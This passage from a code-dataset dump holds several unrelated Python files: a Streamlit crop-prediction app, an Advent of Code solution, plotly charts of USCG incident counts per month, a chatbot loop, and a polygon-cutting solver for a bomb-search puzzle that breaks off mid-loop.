ds.Next()\r\n","sub_path":"dialogs/Transaksi/fBranchDistributionDetail_data.py","file_name":"fBranchDistributionDetail_data.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"74846221","text":"import numpy as np\nimport pandas as pd\nimport streamlit as st\nimport pickle\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport plotly.figure_factory as ff\n\nmodel = pickle.load(open('model.pkl', 'rb'))\ndf = pd.read_csv(\"crop_prediction_model_one.csv\")\n\nconverts_dict = {\n 'Temperature': 'temperature',\n 'Humidity': 'humidity',\n}\n\ndef predict_crop(temperature, humidity):\n input = np.array([[temperature, humidity]]).astype(np.float64)\n prediction = model.predict(input)\n return prediction[0]\n\ndef scatterPlotDrawer(x,y):\n fig = plt.figure(figsize=(20,15))\n sns.set_style(\"whitegrid\")\n sns.scatterplot(data=df, x=x, y=y, hue=\"label\", size=\"label\", palette=\"deep\", sizes=(20, 200), legend=\"full\")\n plt.xlabel(x, fontsize=22)\n plt.ylabel(y, fontsize=22)\n plt.xticks(rotation=90, fontsize=18)\n plt.legend(prop={'size': 18})\n plt.yticks(fontsize=16)\n st.write(fig)\n\ndef barPlotDrawer(x,y):\n fig = plt.figure(figsize=(20,15))\n sns.set_style(\"whitegrid\")\n sns.barplot(data=df, x=x, y=y)\n plt.xlabel(\"Crops\", fontsize=22)\n plt.ylabel(y, fontsize=22)\n plt.xticks(rotation=90, fontsize=18)\n plt.legend(prop={'size': 18})\n plt.yticks(fontsize=16)\n st.write(fig)\n\ndef boxPlotDrawer(x,y):\n fig = plt.figure(figsize=(20,15))\n sns.set_style(\"whitegrid\")\n sns.boxplot(x=x, y=y, data=df)\n sns.despine(offset=10, trim=True)\n plt.xlabel(\"Crops\", fontsize=22)\n plt.ylabel(y, fontsize=22)\n plt.xticks(rotation=90, fontsize=18)\n plt.legend(prop={'size': 18})\n plt.yticks(fontsize=16)\n st.write(fig)\n\ndef main():\n html_temp_vis = \"\"\"\n
\n

Visualize Soil Properties

\n
\n \"\"\"\n\n html_temp_pred = \"\"\"\n
\n

Which Crop To Cultivate?

\n
\n \"\"\"\n\n st.sidebar.title(\"Select One\")\n select_type = st.sidebar.radio(\"\", ('Graph', 'Predict Your Crop'))\n\n\n if select_type == 'Graph':\n st.markdown(html_temp_vis, unsafe_allow_html=True)\n plot_type = st.selectbox(\"Select plot type\", ('Bar Plot', 'Scatter Plot', 'Box Plot'))\n st.subheader(\"Relation between features\")\n\n # Plot!\n\n x = \"\"\n y = \"\"\n\n if plot_type == 'Bar Plot':\n x = 'label'\n y = st.selectbox(\"Select a feature to compare between crops\",\n ('Temperature', 'Humidity'))\n if plot_type == 'Scatter Plot':\n x = st.selectbox(\"Select a property for 'X' axis\",\n ('Temperature', 'Humidity'))\n y = st.selectbox(\"Select a property for 'Y' axis\",\n ('Temperature', 'Humidity'))\n if plot_type == 'Box Plot':\n x = \"label\"\n y = st.selectbox(\"Select a feature\",\n ('Temperature', 'Humidity'))\n\n if st.button(\"Visulaize\"):\n if plot_type == 'Bar Plot':\n y = converts_dict[y]\n barPlotDrawer(x, y)\n if plot_type == 'Scatter Plot':\n x = converts_dict[x]\n y = converts_dict[y]\n scatterPlotDrawer(x, y)\n if plot_type == 'Box Plot':\n y = converts_dict[y]\n boxPlotDrawer(x, y)\n \n if select_type == \"Predict Your Crop\":\n st.markdown(html_temp_pred, unsafe_allow_html=True)\n st.header(\"To predict your crop give values\")\n st.subheader(\"Drag to Give Values\")\n temperature = st.slider('Temperature', 8.83, 43.68)\n humidity = st.slider('Humidity', 14.26, 99.98)\n \n if st.button(\"Predict your crop\"):\n output=predict_crop(temperature, humidity)\n res = \"“\"+ output.capitalize() + \"”\"\n st.success('The most suitable crop for your field is {}'.format(res))\n\nif __name__=='__main__':\n main()\n \n","sub_path":"Predict_Crop.py","file_name":"Predict_Crop.py","file_ext":"py","file_size_in_byte":4004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"392365292","text":"#!/usr/bin/env python3\nfrom collections import defaultdict\nimport operator\n\nclass Day6:\n def __init__(self):\n indata = [14,0,15,12,11,11,3,5,1,6,8,4,9,1,8,4]\n tupp = tuple(indata)\n history = defaultdict(tuple)\n ll = len(indata)\n self.cycles = 0\n while tupp not in history:\n history[tupp] = self.cycles\n self.cycles += 1\n index, value = max(enumerate(indata), key=operator.itemgetter(1))\n indata[index] = 0\n while value > 0:\n index = (index + 1) % ll\n indata[index] += 1\n value -= 1\n tupp = tuple(indata)\n self.pt2 = self.cycles - history[tupp]\n\n def part1(self):\n return self.cycles\n\n def part2(self):\n return self.pt2\n","sub_path":"day6/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"160077072","text":"'''\r\n@author: Timothy Stephens\r\nMSC Charts for Security\r\n6/22/2020\r\n'''\r\n#Importing libraries relevant to intended graphs\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport plotly.express as px\r\nimport plotly.graph_objects as go\r\n\r\n#importing dataframes from excel file\r\ndataframe2013 = pd.read_excel(r\"C:\\Users\\steph\\OneDrive\\Desktop\\MSC Stuff\\MISLE Incident Data.xlsx\",sheet_name = \"2013\" )\r\ndataframe2014 = pd.read_excel(r\"C:\\Users\\steph\\OneDrive\\Desktop\\MSC Stuff\\MISLE Incident Data.xlsx\",sheet_name = \"2014\" )\r\ndataframe2015 = pd.read_excel(r\"C:\\Users\\steph\\OneDrive\\Desktop\\MSC Stuff\\MISLE Incident Data.xlsx\",sheet_name = \"2015\" )\r\ndataframe2016 = pd.read_excel(r\"C:\\Users\\steph\\OneDrive\\Desktop\\MSC Stuff\\MISLE Incident Data.xlsx\",sheet_name = \"2016\" )\r\ndataframe2017 = pd.read_excel(r\"C:\\Users\\steph\\OneDrive\\Desktop\\MSC Stuff\\MISLE Incident Data.xlsx\",sheet_name = \"2017\" )\r\ndataframe2018 = pd.read_excel(r\"C:\\Users\\steph\\OneDrive\\Desktop\\MSC Stuff\\MISLE Incident Data.xlsx\",sheet_name = \"2018\" )\r\ndataframe2019 = pd.read_excel(r\"C:\\Users\\steph\\OneDrive\\Desktop\\MSC Stuff\\MISLE Incident Data.xlsx\",sheet_name = \"2019\" )\r\ndataframe2020 = pd.read_excel(r\"C:\\Users\\steph\\OneDrive\\Desktop\\MSC Stuff\\MISLE Incident Data.xlsx\",sheet_name = \"2020\" )\r\n\r\n\r\n#creating a function to count events per month for a year, so 12 numbers total listed\r\ndef event_count(dataframe):\r\n eventlist = []\r\n month = 1\r\n counter = 0\r\n while month < 13:\r\n for x in dataframe:\r\n if x == month:\r\n counter += 1\r\n eventlist.append(counter)\r\n month += 1\r\n counter = 0\r\n return eventlist\r\n\r\n#separate function for polar charts since i have to recount January to close circle\r\ndef event_countP(dataframe):\r\n eventlist = []\r\n month = 1\r\n counter = 0\r\n while month < 13:\r\n for x in dataframe:\r\n if x == month:\r\n counter += 1\r\n eventlist.append(counter)\r\n month += 1\r\n counter = 0\r\n eventlist.append(eventlist[0])\r\n return eventlist\r\n\r\n\r\n\r\n \r\n#dataframes being made\r\n#note i add an extra january month and event value to complete the circle\r\ndata2013 = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December','January'],\r\n 'Events':event_countP(dataframe2013[\"Month\"])\r\n }\r\nvar2013 = pd.DataFrame(data2013,columns = ['Month','Events'])\r\n\r\ndata2014 = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December','January'],\r\n 'Events':event_countP(dataframe2014[\"Month\"])\r\n }\r\nvar2014 = pd.DataFrame(data2014,columns = ['Month','Events'])\r\n\r\ndata2015 = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December','January'],\r\n 'Events':event_countP(dataframe2015[\"Month\"])\r\n }\r\nvar2015 = pd.DataFrame(data2015,columns = ['Month','Events'])\r\n\r\ndata2016 = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December','January'],\r\n 'Events':event_countP(dataframe2016[\"Month\"])\r\n\r\n }\r\nvar2016 = pd.DataFrame(data2016,columns = ['Month','Events'])\r\n\r\ndata2017 = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December','January'],\r\n 'Events':event_countP(dataframe2017[\"Month\"])\r\n\r\n }\r\nvar2017 = pd.DataFrame(data2017,columns = ['Month','Events'])\r\n\r\ndata2018 = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December','January'],\r\n 'Events':event_countP(dataframe2018[\"Month\"])\r\n\r\n }\r\nvar2018 = pd.DataFrame(data2018,columns = ['Month','Events'])\r\n\r\ndata2019 = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December','January'],\r\n 'Events':event_countP(dataframe2019[\"Month\"])\r\n\r\n }\r\nvar2019 = pd.DataFrame(data2019,columns = ['Month','Events'])\r\n\r\ndata2020 = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December','January'],\r\n 'Events':event_countP(dataframe2020[\"Month\"])\r\n\r\n }\r\nvar2020 = pd.DataFrame(data2020,columns = ['Month','Events'])\r\n\r\n\r\n#polar chart being made\r\n#format is the same for adding figures until satisfied \r\nfig = go.Figure()\r\n\r\nfig.add_trace(go.Scatterpolar(\r\n name = \"2013\",\r\n r = var2013[\"Events\"],\r\n theta = var2013[\"Month\"],\r\n mode = 'lines',\r\n\r\n connectgaps = True))\r\n\r\nfig.add_trace(go.Scatterpolar(\r\n name = \"2014\",\r\n r = var2014[\"Events\"],\r\n theta = var2014[\"Month\"],\r\n mode = 'lines',\r\n \r\n connectgaps = True))\r\n\r\nfig.add_trace(go.Scatterpolar(\r\n name = \"2015\",\r\n r = var2015[\"Events\"],\r\n theta = var2015[\"Month\"],\r\n mode = 'lines',\r\n\r\n connectgaps = True))\r\n\r\nfig.add_trace(go.Scatterpolar(\r\n name = \"2016\",\r\n r = var2016[\"Events\"],\r\n theta = var2016[\"Month\"],\r\n mode = 'lines',\r\n\r\n connectgaps = True))\r\n\r\nfig.add_trace(go.Scatterpolar(\r\n name = \"2017\",\r\n r = var2017[\"Events\"],\r\n theta = var2017[\"Month\"],\r\n mode = 'lines',\r\n\r\n connectgaps = True))\r\n\r\nfig.add_trace(go.Scatterpolar(\r\n name = \"2018\",\r\n r = var2018[\"Events\"],\r\n theta = var2018[\"Month\"],\r\n mode = 'lines',\r\n \r\n connectgaps = True))\r\n\r\nfig.add_trace(go.Scatterpolar(\r\n name = \"2019\",\r\n r = var2019[\"Events\"],\r\n theta = var2019[\"Month\"],\r\n mode = 'lines',\r\n\r\n connectgaps = True))\r\n\r\nfig.add_trace(go.Scatterpolar(\r\n name = \"2020\",\r\n r = var2020[\"Events\"],\r\n theta = var2020[\"Month\"],\r\n mode = 'lines',\r\n\r\n connectgaps = True))\r\n\r\n#layout stuff \r\nfig.update_layout(\r\n template=\"plotly_dark\",\r\n title = '[All] USCG Incidents per Calendar Month 2013 to 2020',\r\n\r\n )\r\n#figure being shown\r\nfig.show()\r\n\r\n#similar dataframes being made\r\n#note i remove an extra january month and event value since its not a circle\r\ndata2013B = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December'],\r\n 'Events': event_count(dataframe2013[\"Month\"])\r\n }\r\nvar2013B = pd.DataFrame(data2013B,columns = ['Month','Events'])\r\n\r\ndata2014B = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December'],\r\n 'Events': event_count(dataframe2014[\"Month\"])\r\n }\r\nvar2014B = pd.DataFrame(data2014B,columns = ['Month','Events'])\r\n\r\ndata2015B = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December'],\r\n 'Events': event_count(dataframe2015[\"Month\"])\r\n }\r\nvar2015B = pd.DataFrame(data2015B,columns = ['Month','Events'])\r\n\r\ndata2016B = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December'],\r\n 'Events': event_count(dataframe2016[\"Month\"])\r\n }\r\nvar2016B = pd.DataFrame(data2016B,columns = ['Month','Events'])\r\n\r\ndata2017B = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December'],\r\n 'Events': event_count(dataframe2017[\"Month\"])\r\n }\r\nvar2017B = pd.DataFrame(data2017B,columns = ['Month','Events'])\r\n\r\ndata2018B = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December'],\r\n 'Events': event_count(dataframe2018[\"Month\"])\r\n }\r\nvar2018B = pd.DataFrame(data2018B,columns = ['Month','Events'])\r\n\r\ndata2019B = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December'],\r\n 'Events': event_count(dataframe2019[\"Month\"])\r\n }\r\nvar2019B = pd.DataFrame(data2019B,columns = ['Month','Events'])\r\n\r\ndata2020B = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December'],\r\n 'Events': event_count(dataframe2020[\"Month\"])\r\n }\r\nvar2020B = pd.DataFrame(data2020B,columns = ['Month','Events'])\r\n\r\n\r\n\r\n#line chart being made\r\nfig2 = go.Figure()\r\n\r\nfig2.add_trace(go.Scatter(\r\n name = \"2013\",\r\n x=var2013B[\"Month\"],\r\n y=var2013B[\"Events\"],\r\n mode= 'lines'))\r\n\r\nfig2.add_trace(go.Scatter(\r\n name = \"2014\",\r\n x=var2014B[\"Month\"],\r\n y=var2014B[\"Events\"],\r\n mode= 'lines'))\r\n\r\nfig2.add_trace(go.Scatter(\r\n name = \"2015\",\r\n x=var2015B[\"Month\"],\r\n y=var2015B[\"Events\"],\r\n mode= 'lines'))\r\n\r\nfig2.add_trace(go.Scatter(\r\n name = \"2016\",\r\n x=var2016B[\"Month\"],\r\n y=var2016B[\"Events\"],\r\n mode= 'lines'))\r\n\r\nfig2.add_trace(go.Scatter(\r\n name = \"2017\",\r\n x=var2017B[\"Month\"],\r\n y=var2017B[\"Events\"],\r\n mode= 'lines'))\r\n\r\nfig2.add_trace(go.Scatter(\r\n name = \"2018\",\r\n x=var2018B[\"Month\"],\r\n y=var2018B[\"Events\"],\r\n mode= 'lines'))\r\n\r\nfig2.add_trace(go.Scatter(\r\n name = \"2019\",\r\n x=var2019B[\"Month\"],\r\n y=var2019B[\"Events\"],\r\n mode= 'lines'))\r\n\r\nfig2.add_trace(go.Scatter(\r\n name = \"2020\",\r\n x=var2020B[\"Month\"],\r\n y=var2020B[\"Events\"],\r\n mode= 'lines'))\r\n\r\n\r\n\r\nfig2.update_layout(\r\n template=\"plotly_dark\",\r\n title = '[All] USCG Incidents per Calendar Month 2013 to 2020',\r\n\r\n )\r\n#figure being shown\r\nfig2.show()\r\n \r\n\r\n","sub_path":"All MultiLine Graphs (2013-2020).py","file_name":"All MultiLine Graphs (2013-2020).py","file_ext":"py","file_size_in_byte":9461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"446258999","text":"from Bot import contextual as ctl\n\nv = ctl.Bot()\nv.organize_data('intents.json')\nv.remove_duplicates()\nv.trainer()\nv.neural_network()\n\nwhile True:\n\ti = input(\"Want to continue? \")\n\tif i == '1':\n\t\tn = input('your question ')\n\t\tv.response(n)\n\telse:\n\t\tbreak","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"486017726","text":"import time\nimport sys\nimport math\n\n\ndef DEBUG(x):\n print(\"[%d ms]#\" % (time.time() * 1000 % 100000), x, file=sys.stderr)\n sys.stderr.flush()\n\n\nclass Pos():\n def __init__(self, x, y): self._p = x, y\n\n def __str__(self): return \"(%s,%s)\" % self._p\n\n def __eq__(self, other): return self._p == other._p\n\n def intStr(self): return \"%d %d\" % self._p\n\n def get(self): return self._p\n\n def copy(self):\n x, y = self._p\n return Pos(x, y)\n\n def dist(self, other):\n x, y = self._p\n xo, yo = other._p\n dx, dy = x - xo, y - yo\n return math.sqrt(dx * dx + dy * dy)\n\n def middle(self, p2):\n x1, y1 = self.get()\n x2, y2 = p2.get()\n return Pos((x1 + x2) / 2, (y1 + y2) / 2)\n\n def add(self, x, y):\n x1, y1 = self.get()\n return Pos(x1 + x, y1 + y)\n\n def coef(self, k):\n x, y = self._p\n return Pos(int(x * k), int(y * k))\n\n def force_inside(self):\n x, y = self._p\n self._p = (min(max(int(x), 0), w - 1), min(max(int(y), 0), h - 1))\n\n def force_on_grid(self):\n self._p = tuple([int(i) for i in self._p])\n\n\ndef symm(p, pCenter, k=1):\n x, y = p.get()\n x0, y0 = pCenter.get()\n return pCenter.add(x0 - x * k, y0 - y * k)\n\n\nclass Line():\n def __init__(self, p1, p2, pCenter=None):\n self._p1, self._p2 = p1, p2\n \"\"\" construct a line passing by p1 and p2\"\"\"\n if p1 == p2: raise Exception(\"Cannot draw a line with only one point\")\n x1, y1 = p1.get()\n x2, y2 = p2.get()\n dx = x1 - x2\n dy = y1 - y2\n a, b = dy, -dx\n if pCenter: x1, y1 = pCenter.get()\n c = a * x1 + b * y1\n g = 1\n if a == 0.0:\n g = b\n elif b == 0.0:\n g = a\n elif abs(int(a) - a) < 0.00000001 and abs(int(b) - b) < 0.00000001:\n g = math.gcd(int(a), int(b))\n self._def = (a / g, b / g, c / g)\n self._dx, self._dy = dx / g, dy / g\n\n def isOn(self, p):\n (a, b, c) = self._def\n x, y = p.get()\n return abs(a * x + b * y - c) < 0.000001\n\n def sgn(self, p):\n (a, b, c) = self._def\n x, y = p.get()\n v = a * x + b * y - c\n if v < -0.00001: return -1\n if v > 0.00001: return 1\n return 0\n\n def ortho(self, p):\n \"\"\" return a line orthogonal to self, passing by \"p\" \"\"\"\n pCenter = self._p1.middle(self._p2)\n p1 = pCenter.add(self._dy, -self._dx)\n p2 = pCenter.add(-self._dy, self._dx)\n return Line(p1, p2, pCenter=p)\n\n def __str__(self):\n (a, b, c) = self._def\n l = []\n if a == 1:\n l.append(\"x\")\n elif a != 0:\n l.append(\"%s*x\" % a)\n if b == 1:\n l.append(\"y\")\n elif b != 0:\n l.append(\"%s*y\" % b)\n return \"Ln[\" + \" + \".join(l) + \" = %s\" % (c) + \"]\"\n\n def intersect(self, line):\n (a, b, c) = self._def\n (A, B, C) = line._def\n div = (A * b - B * a)\n if div == 0: return None # parallel\n y = (A * c - C * a) / div\n x = (C * b - B * c) / div\n p = Pos(x, y)\n if not self.isOn(p): raise Exception(\"intersect error 1\")\n if not self.isOn(p): raise Exception(\"intersect error 2\")\n return p\n\n def dx_dy(self):\n (a, b, c) = self._def\n if abs(int(a) - a) < 0.00000001 and abs(int(b) - b) < 0.00000001: return (-int(b), int(a))\n return (0, 0)\n\n\n##############(###########################\n##### SEGMENT\n#########################################\nclass Segment():\n def __str__(self):\n return \"SEGMENT[ %s from <%s> to <%s> (%d)]\" % (self.line, self.p1, self.p2, self._sgn)\n\n def __init__(self, p1, p2, p_in=None):\n self.p1, self.p2 = p1, p2\n self.p_in = p_in\n self.line = Line(p1, p2)\n if self.p_in:\n self._sgn = self.line.sgn(p_in)\n else:\n self._sgn = 0\n # DEBUG(\"Create %s\"%self)\n\n def copy(self):\n return Segment(self.p1, self.p2, self.p_in)\n\n def inside(self, p):\n s = self.line.sgn(p)\n return s == 0 or s == self._sgn\n\n def length(self):\n return self.p1.dist(self.p2)\n\n\n#########################################\n##### POLYEDRE\n#########################################\nclass Polyedre():\n def __init__(self):\n bounds = [Pos(-0.1, -0.1), Pos(w - 0.9, -0.1), Pos(w - 0.9, h - 0.9), Pos(-0.1, h - 0.9)]\n p_in = Pos(w // 2, h // 2)\n self.seg = [Segment(bounds[i], bounds[(i + 1) % len(bounds)], p_in) for i in range(len(bounds))]\n self._single_seg = None\n\n def is_1d(self):\n return bool(self._single_seg)\n\n def __str__(self):\n return \"Poly[%s]\" % (\";\".join([\"%s\" % p.p1 for p in self.seg]))\n\n def copy(self):\n res = Polyedre()\n res.seg = [s.copy() for s in self.seg]\n if res._single_seg:\n l, p1, p2, possible = res._single_seg\n self._single_seg = (l.copy(), p1.copy(), p2.cop(), possible[:])\n return res\n\n def isInside(self, p):\n if self._single_seg:\n _, _, _, poss = self._single_seg\n return p in poss\n for seg in self.seg:\n if not seg.inside(p):\n # DEBUG(\"%s not inside because of %s\"%(p, point))\n return False\n return True\n\n def addLine(self, line, p_in):\n '''\n Cut polyedre by a new line. The given point defines which side is in\n '''\n sgn = line.sgn(p_in)\n if self._single_seg:\n l, p1, p2, possible = self._single_seg\n DEBUG(\"Cut %s / %s\" % (l, line))\n pi = l.intersect(line)\n if not pi: return\n out1 = line.sgn(p1) != sgn\n out2 = line.sgn(p2) != sgn\n if out1 and out2:\n raise Exception(\"???\")\n elif out1:\n p1 = pi\n elif out2:\n p2 = pi\n else:\n return\n self._single_seg = (line, p1.copy(), p2.copy(), possible)\n self.seg = [Segment(p1, p2)]\n return\n # DEBUG(\"Adding line %s / %s\"%(line,p_in))\n # find intersection point (p_in is inside)\n p1merge = None\n p2merge = None\n deleted = False\n for p in self.seg[:]:\n out1 = line.sgn(p.p1) != sgn\n out2 = line.sgn(p.p2) != sgn\n if out1 and out2: # line to be removed\n # DEBUG (\"Line %s is now outside\"%p.line)\n deleted = True\n self.seg.remove(p)\n elif out1:\n # DEBUG (\"Point %s from %s is now outside\"%(p.p1,p.line))\n # replace p1 by intersection\n p.p1 = p.line.intersect(line)\n # DEBUG(\"Intersect1:%s\"%p.p1)\n if p1merge: raise Exception(\"Unexpected multiple intersect\")\n p1merge = p.p1\n elif out2:\n # DEBUG (\"Point %s from %s is now outside\"%(p.p2,p.line))\n # replace p2 by intersection\n p.p2 = p.line.intersect(line)\n # DEBUG(\"Intersect2:%s\"%p.p2)\n if p2merge: raise Exception(\"Unexpected multiple intersect\")\n p2merge = p.p2\n if p1merge or p2merge or deleted:\n if not (p1merge and p2merge): raise Exception(\"Incomplete intersection\")\n if p1merge != p2merge:\n self.seg.append(Segment(p2merge, p1merge, p_in))\n\n # else:raise (\"Unexpected add line with no new restrictions\")\n\n # The area is restricted to a single line (SAME)\n def on_line(self, line):\n if self._single_seg:\n l, p1, p2, _ = self._single_seg\n p = line.intersect(l)\n DEBUG(\"Intesect %s %s\" % (l, line))\n if p:\n self._single_seg = (line, p.copy(), p.copy(), [p])\n return [p]\n else:\n pm = p1.middle(p2)\n pm.force_on_grid()\n self._single_seg = (line, pm.copy(), pm.copy(), [pm])\n return [pm]\n # Search intersetions\n pts = []\n for s in self.seg[:]:\n pt = s.line.intersect(line)\n if pt and self.isInside(pt):\n pts.append(pt)\n if len(pts) != 2:\n raise Exception(\"???\")\n p1, p2 = pts\n DEBUG(\"Intersect point:%s,%s\" % (p1, p2))\n dx, dy = line.dx_dy()\n DEBUG(\"dx_dy:%s,%s\" % (dx, dy))\n # find a point on line\n x0, y0 = 0, 0\n p = None\n pm = p1.middle(p2)\n pm.force_on_grid()\n p0 = pm\n while not p:\n if line.isOn(p0):\n p = p0\n break\n x0 += 1\n if x0 > abs(dx):\n x0 = 0\n y0 += 1\n if y0 > abs(dy): raise Exception(\"???\")\n p0 = pm.add(x0, y0)\n DEBUG(\"Found point on line:%s\" % p)\n\n possible = [p.copy()]\n p0 = p.add(dx, dy)\n while self.isInside(p0):\n possible.append(p0)\n p0 = p0.add(dx, dy)\n dx, dy = -dx, -dy\n p0 = p.add(dx, dy)\n while self.isInside(p0):\n possible.append(p0)\n p0 = p0.add(dx, dy)\n self._single_seg = (line, p1.copy(), p2.copy(), possible)\n self.seg = [Segment(p1, p2)]\n return possible[:]\n\n def size(self):\n xM, yM = 0, 0\n xm, ym = w, h\n for p in self.seg:\n x, y = p.p1.get()\n xM = max(xM, x)\n xm = min(xm, x)\n yM = max(yM, y)\n ym = min(ym, y)\n return (int(xm - 0.5), int(ym - 0.5), int(xM + 0.5), int(yM + 0.5))\n\n def center(self):\n # ponderation by the length of segments\n x, y = 0, 0\n nb = 0.0\n for p in self.seg:\n k = p.p1.dist(p.p2)\n dx, dy = p.p1.get()\n x, y = x + dx * k, y + dy * k\n dx, dy = p.p2.get()\n x, y = x + dx * k, y + dy * k\n nb = nb + 2 * k\n return Pos(x / nb, y / nb)\n\n def intersect(self, line):\n if self._single_seg:\n l, p1, p2, possible = self._single_seg\n p = l.intersect(line)\n if p and self.isInside(p): return [p]\n return []\n res = []\n for s in self.seg:\n p = s.line.intersect(line)\n if p is None: continue\n if self.isInside(p): res.append(p)\n return res\n\n def aPointFarFrom(self, p):\n if self._single_seg:\n l, p1, p2, possible = self._single_seg\n dM = 0\n res = None\n for pp in possible:\n d = pp.dist(p)\n if d > dM:\n dM = d\n res = pp\n return res\n dmax1 = 0\n dmax2 = 0\n res1 = None\n res2 = None\n for s in self.seg:\n d = s.p1.dist(p)\n if d > dmax1:\n dmax2 = dmax1\n res2 = res1\n dmax1 = d\n res1 = s.p1\n elif d > dmax2:\n dmax2 = d\n res2 = s.p1\n return res2\n\n def area(self):\n if self._single_seg:\n l, p1, p2, _ = self._single_seg\n return p1.dist(p2)\n else:\n c = self.center()\n total = 0\n for s in self.seg:\n a = s.length()\n p = s.line.ortho(c).intersect(s.line)\n total = total + s.length() * p.dist(c)\n return total\n\n def length(self):\n if self._single_seg:\n l, p1, p2, _ = self._single_seg\n return 2 * p1.dist(p2)\n else:\n return sum(s.p1.dist(s.p2) for s in self.seg)\n\n\nDEBUG(\"Start\")\n\n# w: width of the building.\n# h: height of the building.\nw, h = [int(i) for i in input().split()]\nn = int(input()) # maximum number of turns before game over.\nx0, y0 = [int(i) for i in input().split()]\n\ncurPos = Pos(x0, y0)\nprev_pos = curPos\n\narea = Polyedre()\nDEBUG(\"SIZE: %d , %d\" % (w, h))\nDEBUG(\"is inside %s : %d\" % (curPos, area.isInside(curPos)))\n\ndone = []\n\nif w == 1:\n possible = [Pos(0, y) for y in range(h)]\nelif h == 1:\n possible = [Pos(x, 0) for x in range(w)]\nelse:\n possible = []\n\n# game loop\nwhile True:\n DEBUG(\"Possible:%d\" % len(possible))\n DEBUG(\"Len=%d\" % area.length())\n # if len(possible)<10:DEBUG(\".\".join([\"%s\"%p for p in possible]))\n bomb_dir = input()\n DEBUG(\"Input=%s\" % bomb_dir)\n pCenter = prev_pos.middle(curPos)\n if bomb_dir != \"UNKNOWN\":\n if prev_pos == curPos:\n mediane = None\n else:\n mediane = Line(prev_pos, curPos).ortho(pCenter)\n\n if bomb_dir == \"UNKNOWN\":\n bestPoint = Pos(w - 1 - x0, h - 1 - y0)\n elif bomb_dir == \"SAME\":\n # if mediane:DEBUG(\"Intersect:%s\"%\"/\".join([\"%s\"%i for i in area.intersect(mediane)]))\n l = Line(prev_pos, curPos)\n lo = l.ortho(prev_pos.middle(curPos))\n DEBUG(\"Create %s => %s (%s)\" % (prev_pos, curPos, lo))\n new_poss = area.on_line(lo)\n DEBUG(\"Nb poss=%d\" % (len(new_poss)))\n if len(new_poss) == 1:\n possible = new_poss[:]\n\n poss2 = []\n if possible:\n # restrict possible positions\n for p in possible[:]:\n if p in new_poss: poss2.append(p)\n possible = poss2\n DEBUG(\"restrict Poss to %d elements\" % len(possible))\n if len(possible) == 1: DEBUG(\"POS=%s\" % possible[0])\n else:\n if len(new_poss) < 20: possible = new_poss\n if possible:\n bestPoint = possible[0]\n\n else:\n pos_side = curPos if (bomb_dir == \"WARMER\") else prev_pos\n \"\"\"\n Add new line and limits\n \"\"\"\n area.addLine(mediane, pos_side)\n DEBUG(\"Area=%s\" % (area))\n\n if possible:\n for p in possible[:]:\n if not area.isInside(p): possible.remove(p)\n \"\"\"\n Find next target\n \"\"\"\n if not possible:\n xm, ym, xM, yM = area.size()\n dx, dy = xM - xm, yM - ym\n possible = []\n if dx + dy < 10:\n # check possible points\n DEBUG(\"Size %s,%s\" % (dx, dy))\n for x in range(xm, xM + 1):\n for y in range(ym, yM + 1):\n p = Pos(x, y)\n if area.isInside(p):\n DEBUG(\"Check %s,%s\" % (x, y))\n possible.append(p)\n\n pCenter = area.center()\n pFar = area.aPointFarFrom(curPos)\n if False:\n l = Line(curPos, pCenter).ortho(pCenter)\n p = area.intersect(l)[0]\n bestPoint = p\n elif area.is_1d():\n # got to middle of remaining area\n bestPoint = area.center()\n if bestPoint == curPos:\n bestPoint = pFar\n elif possible:\n DEBUG(\"Curr is %s\" % curPos)\n DEBUG(\"Centre is %s\" % pCenter)\n bestPoint = symm(curPos, pCenter, 0.95)\n DEBUG(\"bestPoint is %s\" % bestPoint)\n\n elif True:\n try:\n # Simulate positions to find which one will best cut remaining area in 2 equal zones\n square = Polyedre()\n l0 = area.length()\n RATIO_THR = 0.95\n NB_ITER_MAX = 7\n max_ratio = 0\n best_pos = None\n _done = [curPos]\n ax, ay, aX, aY = [float(x) for x in area.size()]\n ax, ay, aX, aY = ax - 1, ay - 1, aX + 1, aY + 1\n DEBUG(\"From %s\" % (curPos))\n aa = area.area()\n for direction in range(10, 360)[::3]:\n if max_ratio > RATIO_THR: break\n # DEBUG (\"From %s(%s)\"%(curPos,direction))\n direction = math.pi * direction / 180.0\n x, y = curPos.get()\n p0 = Pos(x, y)\n cs = math.cos(direction)\n sn = math.sin(direction)\n if cs < 0 and x < ax: continue\n if sn < 0 and y < ay: continue\n if cs > 0 and x > aX: continue\n if sn > 0 and y > aY: continue\n DEBUG(\"Direction %d (%d,%d)\" % (direction * 180 / 3.14159, cs * 100, sn * 100))\n if cs < 0:\n dx = (x - ax)\n else:\n dx = (aX - x)\n if sn < 0:\n dy = (y - ay)\n else:\n dy = (aY - y)\n NB_ITER = float(NB_ITER_MAX)\n dd = max(dx, dy) / NB_ITER\n dd = max(dd, 1)\n dx, dy = cs * dd, sn * dd\n ratio_prec = 0\n ratio = 0\n # DEBUG (\"2 